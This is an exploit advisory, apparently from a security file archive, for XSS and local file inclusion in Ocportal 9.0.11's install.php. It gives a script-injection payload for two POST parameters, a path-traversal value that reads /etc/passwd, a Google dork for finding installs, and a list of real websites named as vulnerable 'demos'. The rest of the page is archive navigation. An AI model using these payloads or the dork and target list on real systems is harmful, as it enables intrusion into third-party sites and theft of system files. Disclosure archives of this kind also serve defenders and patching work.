Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion: Posted Mar 19, 2014; Authored by Hossein Hezami; Ocportal version 9.0.11 suffers from cross site scripting and local file inclusion vulnerabilities.; tags | exploit, local, vulnerability, xss, file inclusion; SHA-256 | faede0cb81d60b5fb5a2c35f3e6404feed4e7be0d91a5386bde2e9081d318e46; Download | Favorite | View

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

#######################################################################
#
# Exploit Title: 
# Ocportal 9.0.11 Cross site scripting
# Ocportal 9.0.11 Local File Inclusion
# Date: 2014 18 March
# Author: Dr.3v1l
# Vendor Homepage: http://ocportal.com
# Version : 9.0.11
# Tested on: Windows
# Category: webapps
# Google Dork: intext:"Powered by ocportal"
#
#######################################################################
#
# [+] Exploit (XSS) :
#
# http://<server>/ocportal/install.php
#
# URL encoded POST input parameters (forum_type , db_type) was set to :
# "><script>alert(/xss/)</script>
#
#######################################################################
#
# [+] Exploit (LFI) :
#
# http://<server>/ocportal/install.php
#
# Local File Inclusion , you can read /etc/passwd and exploit it to get acc
# method : POST
# the valun in install file : install.php
# set parameter : default_lang = ../../../../../../../../../../etc/passwd
#
#######################################################################
#
# [+] Demo :
#
# http://herspace.info
# http://visionsandashes.com
# http://stevejarvis.me
# http://magicomilan.net
#
#######################################################################
#
# [+] Contact Me :
#
#     B.Devils.B@gmail.com
#     Twitter.com/Doctor_3v1l
#     Facebook.com/bdb.0web
#     Facebook.com/groups/1427166220843499/
#     IR.linkedin.com/in/hossein3v1l
#     Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam
#######################################################################

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

Share This

Ocportal 9.0.11 Cross Site Scripting / Local File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems